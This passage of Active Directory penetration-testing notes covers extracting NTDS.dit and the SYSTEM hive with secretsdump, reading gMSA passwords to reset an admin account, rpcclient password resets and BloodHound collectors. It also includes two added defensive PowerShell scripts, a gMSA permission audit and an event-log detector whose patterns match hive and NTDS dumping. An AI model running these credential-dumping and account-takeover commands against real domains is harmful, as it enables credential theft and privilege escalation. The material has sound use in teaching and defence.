```
# REMOTE
## Download the .dit file (assuming an evil-winrm session)
download <database_file>
## Save the SYSTEM hive (needed to decrypt the database)
reg.exe save hklm\system <destination>
# LOCAL (once both files have been downloaded)
secretsdump.py -system <system_hive> -ntds <database_file> LOCAL
```
gMSA
(ReadGMSAPassword abuse)
Group Managed Service Accounts (gMSA) are accounts whose password Active Directory manages on behalf of the servers that use them: a long random password is generated and rotated automatically, and only the principals allowed to retrieve the managed password can read it (the ReadGMSAPassword edge in BloodHound). A compromised principal that holds this right can recover the current password.
Get Password (locally)
```powershell
# Read the managed password blob into a variable (requires the ActiveDirectory module
# and ConvertFrom-ADManagedPasswordBlob from DSInternals)
$gmsa = Get-ADServiceAccount -Identity <user> -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp
# Save the password to variables (plain text and SecureString)
(ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
$password = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
$SecPass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
# Reset the password of an admin account if the compromised gMSA has GenericAll over it
$cred = New-Object System.Management.Automation.PSCredential <user>, $SecPass
Invoke-Command -ComputerName 127.0.0.1 -ScriptBlock {Set-ADAccountPassword -Identity <admin_user> -Reset -NewPassword (ConvertTo-SecureString -AsPlainText 'PASSWORD' -Force)} -Credential $cred
```
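Because the attack above depends entirely on who is allowed to read the managed password, the defender-side check is to audit that list for every gMSA. The following script is an added example, not part of the original notes; it assumes the ActiveDirectory RSAT module is installed, that the caller can read gMSA objects, and that the `$BroadGroupNames` list is tuned per domain.

```powershell
# Added example, not from the original notes: list every gMSA and which principals may retrieve
# its managed password, flagging broad groups. Assumes the ActiveDirectory RSAT module is installed
# and the caller can read gMSA objects; $BroadGroupNames is an assumption to tune per domain.
Import-Module ActiveDirectory

$BroadGroupNames = @('Domain Users', 'Domain Computers', 'Authenticated Users', 'Everyone', 'Users')

function Get-GmsaRetrievalAudit {
    [CmdletBinding()]
    param()

    $accounts = Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword, PasswordLastSet
    foreach ($account in $accounts) {
        $principals = @($account.PrincipalsAllowedToRetrieveManagedPassword)

        if ($principals.Count -eq 0) {
            # Nobody can read the password: the gMSA is unused or misconfigured, worth a look either way
            [pscustomobject]@{
                gMSA            = $account.SamAccountName
                Principal       = '<none>'
                PrincipalClass  = ''
                Broad           = $false
                PasswordLastSet = $account.PasswordLastSet
            }
            continue
        }

        foreach ($dn in $principals) {
            try {
                $obj   = Get-ADObject -Identity $dn -Properties sAMAccountName
                $name  = $obj.Name
                $class = $obj.ObjectClass
            } catch {
                # Well-known SIDs or foreign principals do not resolve to an AD object; keep the raw value
                $name  = $dn
                $class = 'unresolved'
            }
            [pscustomobject]@{
                gMSA            = $account.SamAccountName
                Principal       = $name
                PrincipalClass  = $class
                Broad           = ($BroadGroupNames -contains $name)
                PasswordLastSet = $account.PasswordLastSet
            }
        }
    }
}

# Usage: show only the entries that need attention
Get-GmsaRetrievalAudit | Where-Object { $_.Broad -or $_.Principal -eq '<none>' } | Format-Table -AutoSize
```

Each row is one (gMSA, principal) pair, so a gMSA readable by several groups produces several rows; the `Broad` column is what a reviewer sorts on. Principals that do not resolve to an AD object are kept as their raw string rather than dropped, since those are exactly the entries someone may have added by editing the security descriptor directly.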
Often we have credentials belonging to limited administrative accounts such as IT, helpdesk or support.
Sometimes these accounts have the right to reset other users' passwords.
Note that the account name may be worded differently, but it is usually related to the names above.
```
setuserinfo2 <user> 23 <password>
```
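Both the SYSTEM hive / NTDS extraction at the top of these notes and the password resets just described leave entries in the Security log on the host where they run. The script below is an added example, not part of the original notes, for pulling those entries: it assumes Audit Process Creation with command-line logging (event 4688) and Audit User Account Management (event 4724, "an attempt was made to reset an account's password") are enabled, and the `-ComputerName` value is a placeholder.

```powershell
# Added example, not from the original notes: collect Security events matching the SYSTEM hive /
# NTDS extraction steps and password resets. Assumes Audit Process Creation with command-line logging
# (4688) and Audit User Account Management (4724) are enabled; -ComputerName is a placeholder.
function Get-EventDataValue {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event, [string]$Name)
    # Read a named field from the event XML instead of relying on positional Properties indexes
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

function Get-CredentialDumpIndicators {
    [CmdletBinding()]
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [int]$Hours = 24
    )
    $since = (Get-Date).AddHours(-$Hours)

    # Command-line patterns for the steps shown in these notes (regex, case-insensitive by default)
    $patterns = @(
        '\breg(\.exe)?\s+save\s+hklm\\system',   # reg.exe save hklm\system <destination>
        'ntds\.dit'                                # copying or saving the AD database file
    )

    $findings = @()

    $procEvents = Get-WinEvent -ComputerName $ComputerName -ErrorAction SilentlyContinue `
        -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $since }
    foreach ($e in $procEvents) {
        $cmd = Get-EventDataValue -Event $e -Name 'CommandLine'
        if (-not $cmd) { continue }   # command-line logging was not enabled for this event
        $hit = $patterns | Where-Object { $cmd -match $_ } | Select-Object -First 1
        if ($hit) {
            $findings += [pscustomobject]@{
                Time    = $e.TimeCreated
                EventId = 4688
                Subject = Get-EventDataValue -Event $e -Name 'SubjectUserName'
                Detail  = $cmd
            }
        }
    }

    # 4724 is logged on the domain controller that processed the reset, so run this against DCs
    $resetEvents = Get-WinEvent -ComputerName $ComputerName -ErrorAction SilentlyContinue `
        -FilterHashtable @{ LogName = 'Security'; Id = 4724; StartTime = $since }
    foreach ($e in $resetEvents) {
        $findings += [pscustomobject]@{
            Time    = $e.TimeCreated
            EventId = 4724
            Subject = Get-EventDataValue -Event $e -Name 'SubjectUserName'
            Detail  = 'password reset for ' + (Get-EventDataValue -Event $e -Name 'TargetUserName')
        }
    }

    $findings | Sort-Object Time
}

# Usage: last 24 hours on the local machine
Get-CredentialDumpIndicators | Format-Table -AutoSize
```

The `Subject` column is the account that ran the command or performed the reset, which is what ties a 4724 event back to a helpdesk-style account; resets of privileged users by such accounts are the rows to review first.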
BloodHound
BloodHound is used to visualise AD environments and discover attack paths.
Ingestors
SharpHound
Local data collector for BloodHound; runs on a Windows host.
bloodhound.py
Python-based data collection tool for BloodHound.
It queries the domain over the network, so it can be run from a remote machine.